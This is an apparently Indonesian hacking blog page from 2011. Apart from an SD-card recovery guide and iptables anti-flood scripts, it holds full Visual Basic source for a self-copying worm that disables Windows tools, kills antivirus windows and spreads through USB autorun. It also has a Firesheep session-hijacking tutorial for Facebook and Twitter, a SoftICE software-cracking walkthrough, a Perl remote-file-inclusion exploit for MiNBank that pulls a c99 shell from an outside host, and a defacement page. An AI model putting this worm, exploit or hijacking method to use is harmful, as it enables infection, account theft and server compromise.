WILUJEUNG SUMPING MANGGA LINGGIH HEULA,, ^_^

Senyum Kebersamaan untuk menatap Masa Depan.

Kuncinya adalah kemauan, bukan kemampuan. Orang yang memiliki kemampuan, jika tidak ada kemauan, bagaikan mayat hidup yang tidak tahu mau kemana.

satu langkah kita berjuang bersama2

Kuncinya adalah kemauan, bukan kemampuan. Orang yang memiliki kemampuan, jika tidak ada kemauan, bagaikan mayat hidup yang tidak tahu mau kemana.

dengan senyuman kreatifitas yang tinggi

Kuncinya adalah kemauan, bukan kemampuan. Orang yang memiliki kemampuan, jika tidak ada kemauan, bagaikan mayat hidup yang tidak tahu mau kemana.

solidaritas tinggi dan menjunjung IT indonesia

Kuncinya adalah kemauan, bukan kemampuan. Orang yang memiliki kemampuan, jika tidak ada kemauan, bagaikan mayat hidup yang tidak tahu mau kemana.

Dengan free open source kita bisa berkreatifitas

Kuncinya adalah kemauan, bukan kemampuan. Orang yang memiliki kemampuan, jika tidak ada kemauan, bagaikan mayat hidup yang tidak tahu mau kemana.

Tampilkan postingan dengan label Hacker. Tampilkan semua postingan
Tampilkan postingan dengan label Hacker. Tampilkan semua postingan

Selasa, 31 Mei 2011

Mengembalikan File Yang Hilang dari SD Card

$ sudo apt-get cache search forensicafflib - Tools to use AFF segmented archive filesafflib-dev - Tools to use AFF segmented archive filesautopsy - graphical interface to SleuthKitdcfldd - enhanced version of dd for forensics and securityforemost - Forensics application to recover datalibtsk-dev - Development libraries for forensics analysisrdd - a forensic copy programscalpel - A Frugal, High Performance File Carversleuthkit - Tools for forensics analysistct - Forensics related utilities.unhide - Forensic tool to find hidden processes and portsvinetto - A forensics tool to examine Thumbs.db filesapache2-utils - utility programs for webservers


Wuiihh.. banyak juga ya. Kita ambil salah satunya
$ sudo apt-get install foremost
Untuk mengetahui alokasi identitas hardware yang digunakan oleh SD Card, maka dibukalah terminal baru lagi lalu mengetik perintah berikut:$ sudo tail -f /var/log/messages
Sehingga, saat SD Card dimasukkan ke dalam card reader, akan terbaca seperti ini.$ sudo tail -r /var/log/messagesSep 26 07:32:53 blekok kernel: [ 4012.794589] mmc0: new SD card at address a95cSep 26 07:32:53 blekok kernel: [ 4012.817064] mmcblk0: mmc0:a95c SD016 14400KiBSep 26 07:32:53 blekok kernel: [ 4012.817116] mmcblk0: p1
Nah, berarti ID SD Card yang terbaca di Ubuntu Linux adalah mmcblk0. Nah, cek terlebih dahulu, apakah file di SD Card (dengan nama disk) bener-bener hilang.$ ls -al /media/disktotal 68drwx------ 4 lucky root 16384 1970-01-01 07:00 .drwxr-xr-x 6 root root 4096 2009-09-26 07:32 ..drwx------ 3 lucky root 16384 2004-06-24 14:16 DCIMdrwx------ 2 lucky root 16384 2004-06-24 14:16 MISC-rwx------ 1 lucky root 512 2004-06-24 14:16 NIKON001.DSC
Ternyata masih ada, coba lihat file hasil jepretan foto masih ada gak?$ ls -al /media/disk/DCIM/100NIKONtotal 32drwx------ 2 lucky root 16384 2004-06-24 14:16 .drwx------ 3 lucky root 16384 2004-06-24 14:16 ..
Wew.. bener-bener hilang. Okay, sekarang kita masuk ke acara penyelamatan data.Buat folder baru sebagai tempat image SD Card.$ sudo mkdir /media/flash
Umount media SD Card tadi$ sudo umount /dev/mmcblk0p1
Lalu jalankan program yang baru saja kita install tadi:$ sudo foremost -i /dev/mmcblk0 /media/flashProcessing: /dev/mmcblk0|*|
Buat agar kepemilikan directory flash adalah milik kita$ sudo chown -R lucky:lucky /media/flash
Nah, sekarang kita masuk ke dalamnya, apakah terdapat file hasil jepretan dari camera?$ ls -al /media/flash/output/jpgtotal 13412drwxr-xr-- 2 lucky lucky 4096 2009-09-26 07:52 .drwxr-xr-- 3 lucky lucky 4096 2009-09-26 07:52 ..-rw-r--r-- 1 lucky lucky 466801 2009-09-26 07:52 00000288.jpg-rw-r--r-- 1 lucky lucky 189351 2009-09-26 07:52 00001440.jpg-rw-r--r-- 1 lucky lucky 194477 2009-09-26 07:52 00001824.jpg-rw-r--r-- 1 lucky lucky 193172 2009-09-26 07:52 00002208.jpg

HAcked by BTJ

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long 'pencari Kleas dan Window Name Suatu File
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long 'sendmessage

Private Declare Function GetDriveType& Lib "Kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) ' penghandel flashdisk
Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long 'exit windows

Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0

Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2

Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8

Option Explicit

Dim FWnd
Dim obj As Object

Dim doc As Object
Dim WrkBook As Object

Dim WrkSheet As Object
Dim i As Integer

Dim RegRun
Dim FolderStartUp

Dim FolderMyDocuments
Dim FolderTemplates

Dim FolderNetHood
Dim FolderPrintHood

Dim FolderFavorites
Dim FolderSendTo

Dim FolderPrograms
Dim FlashDisk

Private Sub Form_Load()

On Error Resume Next
'acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi

Randomize
Me.Caption = Int(Rnd * 2221189331445#) 'silahkan masukan angka sesuka anda

'menggandakan diri
GandakefolderIstimewa

Me.Visible = False
App.TaskVisible = False 'virus tidak terlihat di task manager

InfeksiRegistry
End Sub

Sub BuatWord()

On Error Resume Next
Set obj = CreateObject("word.application")

Set doc = CreateObject("word.application")
Set doc = obj.Documents.Add

doc.Content = "VIRUS BERHASIL MENGINFEKSIMU - SALAM KENAL"
End Sub

Sub BuatXls()

On Error Resume Next
Set obj = CreateObject("excel.application")

Set WrkBook = obj.workbooks.Add
Set WrkSheet = WrkBook.worksheets.Add

WrkSheet.Cells(15, 4) = "VIRUS BERHASIL MENGINFEKSIMU - SALAM KENAL"
End Sub

Sub InfeksiRegistry()

On Error Resume Next
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderMyDocuments & "\services.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode

RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites & "\SalamKenal.exe" 'virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions", 1, "REG_DWORD" 'Folder Options tdk dapat diakses

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions", 1, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system

RegRun.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" 'Disable CMD dan File .Bat

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon", FolderTemplates & "\smss.exe" 'smss.exe berjalan pada saat startup

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon", FolderSendTo & "\System.exe" 'System.exe berjalan pada saat startup
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind", 1, "REG_DWORD" 'search pd star menu hilang

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind", 1, "REG_DWORD" 'Ssearch pd star menu hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp", 1, "REG_DWORD" 'help suport pd star menu hilang

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp", 1, "REG_DWORD" 'help suport pd star menu hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose", 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose", 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CURRENT_USER\Control Panel\Colors\WindowText", "255 0 0", "REG_SZ" 'DEFAULT TEKS MENJADI MERAH

RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\", FolderFavorites & "\SalamKenal.exe" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives", 4, "REG_DWORD" 'Drive C hilang

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu", 1, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang

RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu", 1, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun", 1, "REG_DWORD" 'Autorun pada CD atau USB

End Sub


Sub GandaKeFlashDisk()
On Error Resume Next

If Dir(FlashDisk & "\Winlogon.exe") <> "Winlogon.exe" Then 'mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & "\Winlogon.exe", FlashDisk & "\Winlogon.exe"

SetAttr FlashDisk & "\Winlogon.exe", vbHidden + vbSystem + vbReadOnly
End If

BuatFileAutorunInf
End Sub

Sub BuatFileAutorunInf()

'membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus (winlogon.exe) akan tereksekusi
On Error Resume Next

Open FlashDisk & "\Autorun.Inf" For Output As 1
Print #1, "[AutoRun]"

Print #1, "Icon=Winlogon.exe" 'Agar FlashDisk Memiliki Icon Sama dengan Virus
Print #1, "Open=Winlogon.exe"

Print #1, "ShellExecute=Winlogon.exe"
Print #1, "Shell\Open\Command=Winlogon.exe"

Print #1, "Shell=Open"
Close #1

SetAttr FlashDisk & "\Autorun.Inf", vbHidden + vbSystem + vbReadOnly
End Sub

Sub GandakefolderIstimewa()

On Error Resume Next
Set RegRun = CreateObject("WScript.Shell")

FolderStartUp = RegRun.specialfolders("StartUp")
FolderMyDocuments = RegRun.specialfolders("MyDocuments")

FolderTemplates = RegRun.specialfolders("Templates")
FolderNetHood = RegRun.specialfolders("NetHood")

FolderPrintHood = RegRun.specialfolders("PrintHood")
FolderFavorites = RegRun.specialfolders("Favorites")

FolderSendTo = RegRun.specialfolders("SendTo")
FolderPrograms = RegRun.specialfolders("Programs")

On Error Resume Next
'membuat virus dengan nama winlogon.exe

FileCopy App.Path & "\" & App.EXEName & ".exe", FolderStartUp & "\WinLogon.Exe"
SetAttr FolderStartUp & "\Winlogon.exe", vbHidden + vbSystem + vbReadOnly

'membuat virus dengan nama services.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderMyDocuments & "\services.Exe"

SetAttr FolderMyDocuments & "\services.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama smss.exe

FileCopy App.Path & "\" & App.EXEName & ".exe", FolderTemplates & "\smss.Exe"
SetAttr FolderTemplates & "\smss.Exe", vbHidden + vbSystem + vbReadOnly

'membuat virus dengan nama csrss.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderPrintHood & "\csrss.Exe"

SetAttr FolderPrintHood & "\csrss.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama Isass.exe

FileCopy App.Path & "\" & App.EXEName & ".exe", FolderNetHood & "\Isass.Exe"
SetAttr FolderNetHood & "\Isass.exe", vbHidden + vbSystem + vbReadOnly

'membuat virus dengan nama SalamKenal.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderFavorites & "\SalamKenal.Exe"

SetAttr FolderFavorites & "\SalamKenal.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama System.exe

FileCopy App.Path & "\" & App.EXEName & ".exe", FolderSendTo & "\System.Exe"
SetAttr FolderSendTo & "\System.exe", vbHidden + vbSystem + vbReadOnly

'membuat virus dengan nama ctfmon.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderPrograms & "\ctfmon.Exe"

SetAttr FolderPrograms & "\ctfmon.exe", vbHidden + vbSystem + vbReadOnly
End Sub

Private Sub Timer1_Timer() 'Timer 1 diberi interval 5 detik

On Error Resume Next
FWnd = FindWindow("OpusApp", "Document1 - Microsoft Word") 'Ms Word

If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True

BuatWord
obj.Visible = True

Timer2.Enabled = True
Timer1.Enabled = False

End If
On Error Resume Next

FWnd = FindWindow("OpusApp", "New Microsoft Word Document.doc - Microsoft Word") 'Ms Word
If FWnd <> 0 Then

SendMessage FWnd, WM_CLOSE, True, True
BuatWord

obj.Visible = True
Timer2.Enabled = True

Timer1.Enabled = False
End If

End Sub


Private Sub Timer2_Timer()
On Error Resume Next

FWnd = FindWindow("XLMAIN", "Microsoft Excel - Book1") 'ms excel
If FWnd <> 0 Then

SendMessage FWnd, WM_CLOSE, True, True
BuatXls

obj.Visible = True
Timer1.Enabled = True

Timer2.Enabled = False
End If

On Error Resume Next
FWnd = FindWindow("XLMAIN", "Microsoft Excel - New Microsoft Excel Worksheet.xls") 'ms excel

If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True

BuatXls
obj.Visible = True

Timer1.Enabled = True
Timer2.Enabled = False

End If
End Sub

Private Sub Timer3_Timer()

On Error Resume Next
'menutup aplikasi yang berbahaya bagi virus

FWnd = FindWindow("#32770", "RUN") 'jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&

FWnd = FindWindow("#32770", "System Configuration Utility") 'msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&

FWnd = FindWindow("#32770", "Windows Task Manager") 'task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&

FWnd = FindWindow("#32770", "Avira AntiVir Personal – Free Antivirus") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&

FWnd = FindWindow("#32770", "AntiVir Guard: Attention, Detection!") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&

FWnd = FindWindow("RegEdit_RegEdit", vbNullString) 'regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&

FWnd = FindWindow("TMainForm", vbNullString) 'aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d
SendMessage FWnd, WM_CLOSE, 0&, 0&

FWnd = FindWindow("TApplication", vbNullString) 'aplikasi buatan Delphi
SendMessage FWnd, WM_CLOSE, 0&, 0&

End Sub


Private Sub Timer4_Timer()
'cari flashdisk

On Error Resume Next
For i = 0 To Drive1.ListCount - 1

If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> "a" Then
FlashDisk = (Drive1.List(i))

Timer4.Enabled = False 'agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk
Exit For

End If
Next

GandaKeFlashDisk '
End Sub

Private Sub Timer5_Timer()

On Error Resume Next
InfeksiRegistry

'Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri
GandakefolderIstimewa

'menyalakan timer 4
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> "a" Then

Timer4.Enabled = True
End If

End Sub


Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1

End Sub


Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
End Sub

Cara Terbaru Bobol Sistem Keamanan Facebook, Twitter Dll

Cara Terbaru Bobol Sistem Keamanan Facebook, Twitter Dll....

Oke ini di mulai dengan banyaknya pertanyaan mengenai cara hacking account facebook, twitter, dll.
perlu di ketahui bahwa semua itu tidak menunjukkan kalo kalian hacker.
cobalah untuk berpikir kritis dan jangan hanya ingin yang instan meskipun disini saya akan menjelaskan salah satu cara hacking facebook, twitter,dll tersebut..
tapi ingatlah.. jangan sekali2 tanyakan pada orang termasuk di forum ini mungkin "BAGAIMANA CARA HACK ACCOUNT FACEBOOK"
atau dengan kata lain.. "KAKAK AJARI SAYA CARA HACKING FACEBOOK" dengan wajah yang memelas dan dengan harapan ada yang membantu kalian untuk kepentingan kalian sendiri cuman kalian pengen di anggap "Hacker" oleh facebook teman kalian yang berhasil di hack

it's not our way..
yang terpenting adalah ilmu bukan anggapan bahwa kalian adalah hacker.. 

cukup basa-basinya.. lanjut ke konteks tutorial..
Bagi yang sudah tahu silahkan lewaaaat juga tidak apa-apa.. 

cara hacking facebook yang akan saya tulis ini adalah dengan menggunakan addons FIRESHEEP. Firesheep merupakan add-on firefox yang bisa digunakan untuk hacking facebook. Firesheep ini buatan Eric Butler, seorang freelance web aplikasi dan pengembang perangkat lunak. Sebenarnya firesheep ini bertujuan untuk mengantisipasi kurangnya keamanan user login dan cookie pada web-web populer seperti facebook. Sebenarnya Firesheep bukan hanya digunakan untuk facebook saja tapi banyak website populer lainnya seperti cookies dari Amazon.com, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Flickr, Github, Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, Twitter, WordPress, Yahoo, Yelp

Firesheep ini merupakan software opensource yang bisa anda download dihttp://codebutler.github.com/firesheep/ dan jangan lupa bagi anda pengguna windows untuk memasang winpcap terlebih dahulu. Setelah anda mendownload dan menginstall firesheep dan anda sedang berselancar ria di jaringan wifi yang gratis misalnya di cafe. maka akan muncul sebuah sidebar baru yang menampilkan user-user yang sedang login ke sebuah web sebagai contoh adalah Facebook. Jika pengguna wifi ada yang login ke facebook dan tampil di sidebar anda, maka anda hanya butuh mengklik 2 kali dan anda sekarang bisa login sebagai dia tanpa harus memasukkan username dan password lagi.

Untuk cara menggunakan firesheep, tinggal tekan Ctrl + Shift + S pada keyboard. maka secara otomatis akan muncul Sidebar di firefox anda. Kemudian klik tombol Start Capturing. Jika berhasil, maka akan muncul beberapa facebook orang-orang yang sedang online di kawasan hotspot anda.
untuk mengantisipasinya tinggal kita gunakan backsheep..
kebalikan dari firesheep fungsinya.. silahkan di mengerti

dengan adanya tutorial ini semoga muncul kesadaran bahwa sebenarnya hacking itu luas dan yang terpenting adalah proses dan ilmu yang kalian dapatkan

TEKNIK FISHING, CARA MUDAH MENG-CRACK SOFTWARE

TEKNIK FISHING, CARA MUDAH MENG-CRACK SOFTWARE

Cracking adalah seni memodifikasi suatu program agar bekerja sesuai keinginan kita. Bagi yang menguasai bahasa Assembly, dapat men-disassembly file EXE dari sebuah aplikasi lalu mengedit kode hex tertentu serta mengembalikannya ke bentuk exe seperti semula agar berjalan sesuai keinginan. Teknik ini di kenal dengan nama Dead Listing.

Bagi kalangan pemula, bisa menggunakan teknik Fishing yakni teknik memancing sebuah serial number dari suatu aplikasi terbatas (trial version,) dengan bantuan sebuah software bernama SoftICE. SoftICE adalah jenis software debbuger yang digunakan untuk melakukan disassembly suatu program pada saat program itu dijalankan.

Untuk system operasi Windows XP dan versi sebelumnya, bisa menggunakan Softice versi 4.2.7 yang bisa di download


http://www.ziddu.com/download/14500830/SoftICE.v4.2.7.RC1.For.XP.rar.html

KONFIGURASI SOFTICE
Proses instalasi Softice tidaklah sulit, sama seperti instalasi program pada umumnya. Hanya saja, Untuk mengkonfigurasi SoftICE pada sistem PC, terdapat 5 pilihan, semuanya tergantung kebutuhan kita. Yakni Boot, Softice berjalan sebelum menjalankan Windows. System, berjalan berbarengan dengan Windows. Automatic, Softice berjalan otomatis namun, tidak semua debug driver aktif. Manual, menjalankan Softice secara manual dan yang terakhir Disable, menonaktifkan Softice pada setiap startup Windows.

Setelah proses instalasi selesai, lakukan modifikasi salah satu file SoftICE yaitu winice.dat untuk mempermudah inisialisasi simbol pada saat di-load.

Caranya, cari winice.dat. biasanya, ada di C:/Program Files/ NuMega/. Lalu buka dengan Notepad. Hilangkan tanda titik koma ( di depan setiap perintah EXP. Ganti nilai PHYSMB dengan kapasitas RAM yang ada di computer. Setelah selesai, klik ‘Save’ dan restart computer agar perubahan bisa berdampak.

SoftICE berjalan otomatis di belakang sistem operasi, maka untuk memunculkannya di layar monitor, tekan tombol Ctrl+D pada keyboard secara bersamaan. Demikian pula pada saat anda ingin menutupnya ke belakang layar.

MEMULAI CRACKING :

1. Buka Program Trial Version
Buka program trial version yang ingin di crack lalu klik ‘Enter Registration Code’. Masukan informasi ‘Name’ dan ‘Registration’ Sesuka anda (jangan tekan ENTER dulu). Tampilkan Softice dengan menekan CTRL-D, pasang breakpoint dengan mengetik di command prompt line : BPX Getdlgitemtexta, lalu

Muncul window SoftICE di layar monitor. SoftICE kemudian menampilkan kode dialognya. Tekan F12 dua kali dan lihat nilai register EAX apakah bernilai 6. Nilai ini adalah banyaknya karakter yang anda masukkan pada Registration. Jika yang diketik sebanyak 4 karakter, maka EAX akan bernilai 4.

Tekan F10 sebanyak 10 kali dan berhenti pada CALL 004079D5 karena di bawahnya ada TEST EAX,EAX yang artinya membandingkan nilai EAX yang anda ketik dengan EAX yang dibuat di dalam CALL 004079D5 di atasnya. Sekarang tekan F8 sekali.

2. Mencari Registration Code
Tekan F10 sebanyak 58 kali sampai register EAX berwarna biru dan anda berhenti di PUSH ESI setelah LEA EAX, [EBP-0140]. Sekarang ketik d eax (disvalid registration# yang anda masukkan sebelumnya) dan tekan .

Lihat bagian kanan, terdapat Registration code yang dihasilkan oleh CALL 004079D5 yang sesuai dengan nama yang anda masukkan. Lalu ketik bc * dan tekan Enter. .

3. Tes Registration Code
Buka program Trial Versionnya. Jika ada pesan error kita lewati. Pada kolom Name ketik sesuai yang kita masukkan pertama. Demikian pula dengan masukan pada kolom Registration#. Lalu klik OK. Sekarang anda bisa menikmatinya sebagai full version.

Menggunakan secara pribadi software hasil crack, masih bisa di maafkan. Tapi mengkomersilkannya untuk meraup untung adalah bagian dari kejahatan.   

Mencegah paket Syn Flood Attack

Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood

#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp --syn -j synjahat
iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP
kemudian jalankan di konsole/terminal
root@bt:~# sh closesyn.sh

2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP
root@bt:~# sh closeping.sh
coba lakukan testing dengan perintah
root@bt:~#ping [target] -s 6500

Selasa, 24 Mei 2011

MiNBank 1.5.0 Remote Command Execution Exploit

#!/usr/bin/perl
####################################################################
# MiNBank 1.5.0 Remote Command Execution Exploit
# download: http://downloads.sourceforge.net/minbank/
#
# Author: Kuningan Cyber Crew
# mail: kng[at]hackermail[dot]com
# facebook: http://www.facebook.com/group.php?gid=213972774880
# team: Kuningan Cyber Crew - [KC**]
#
# KNG Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# "need" allow_url_include = On && register_globals = On
#
#  Attack vector_RFI!: [/minba/utility/utgn_message.php]
#     ...
#      require_once("$minsoft_path/utility/utgn_config.php");
#     ...
#
####################################################################
# OUTPUT: (tested on localhost)
#
# [shell]:~$ id
#  uid=33(www-data) gid=33(www-data) groups=33(www-data)
# [shell]:~$ uname -a
#  Linux h4x0rz 2.6.18-6-686 #1 SMP Fri Dec 12 16:48:28 UTC 2008 i686 GNU/Linux
# [shell]:~$ exit
# h4x0rz:/home/joss/Desktop#


use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}

&clear();

sub banner {
        &clear();
    print "[x] MiNBank 1.5.0 Remote Command Execution Exploit\n";
    print "[x] Written By JosS\n";
    print "[x] sys-project[at]hotmail[dot]com\n\n";
    print "[+] Usage:\n";
    print "[+]     $0 -vuln \"web+path\" -shell \"shell\"\n";
    print "[+] eX: $0 -vuln \"http://www.hack0wn.com/test/\" -shell \"http://hack0wn.com/desc/c99.txt?\"\n\n";
        exit();
}

my $options = GetOptions (
  'help!'            => \$help,
  'vuln=s'            => \$vuln,
  'shell=s'            => \$shell
  );

&banner unless ($vuln);
&banner unless ($shell);

&banner if $banner eq 1;

chomp($vuln);
chomp($shell);

while (){

    print "[shell]:~\$ ";
    chomp($cmd=<STDIN>);

    if ($cmd eq "exit" || $cmd eq "quit") {
        exit 0;
    }

    my $ua = LWP::UserAgent->new;
        $iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
        chomp($iny);
        my $own = $vuln . "/minba/utility/utgn_message.php?minsoft_path=" . $shell . $iny;
        chomp($own);
    my $req = HTTP::Request->new(GET => $own);
    my $res = $ua->request($req);
    my $con = $res->content;
    if ($res->is_success){
        print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
    }
           else
             {
                print "[p0c] Exploit failed\n";
                exit(1);
             }
}

# __h0__

hacked by BTJ

<HTML><HEAD><TITLE>H4ck3d By B.T.J</TITLE> 
<META http-equiv=Content-Type content="text/html; charset=windows-1252"> 
<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD> 
<meta name="description" content="H4ck3d By bayu trov jazz" /> 
<meta name="keywords" content="B.T.J, B.T.J, B.T.J, B.T.J" /> 
<center><img  width="800" border="0" src="http://a3.sphotos.ak.fbcdn.net/hphotos-ak-snc6/217326_207122272645321_100000426502459_721450_2642511_n.jpg"></center> 
<embed wmode='transparent' src='http://www.indowebster.com/templates/object/mediaplayer.swf' FlashVars='file=http://www19.indowebster.com/aa0f615aee11fed98bad443b539f6daa.mp3&frontcolor=white&backcolor=white&lightcolor=0xffffff&logo=http://www.indowebster.com/templates/img/idws.png&autostart=true&loop=true&usefullscreen=false&showeq=true' width='10' height='1' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer' menu='false' allowfullscreen='false'><br /></embed> 
 
 
<div style="text-align: justify;"> 
 
<span style="color: red; font-family: Verdana,Arial,Helvetica,Georgia; font-size: 19px;"><div dir="ltr" style="text-align: left;" trbidi="on"> 
<div style="text-align: center;"> 
<i><div style="text-align: justify;"> 
<div style="text-align: center;"> 
<b>Thanks To : 
</b></div> 
<div style="text-align: center;"> 
-=[Forum Hacker Indonesia]=- </div> 
<div style="text-align: left;"> 
<b><div style="text-align: center;">All Indonesia Hacker</span></div></span></div></b></div> 
</div> 
</i></div> 
</div> 
 
<script> 
//mouse 
//Circling text trail- Tim Tilton 
//Website: http://www.tempermedia.com/ 
//Visit http://www.dynamicdrive.com for this script and more 
function cursor_text_circle(){ 
// your message here 
var msg='H4cK3d By -=[Indonesia]=-'.split('').reverse().join(''); 
 
var font='Verdana,Arial'; 
var size=5; // up to seven 
var color='#ff0000'; 
 
// This is not the rotation speed, its the reaction speed, keep low! 
// Set this to 1 for just plain rotation w/out drag 
var speed=.2; 
 
// This is the rotation speed, set it negative if you want 
// it to spin clockwise 
var rotation=-.2; 
 
// Alter no variables past here!, unless you are good 
//--------------------------------------------------- 
 
 
var ns=(document.layers); 
var ie=(document.all); 
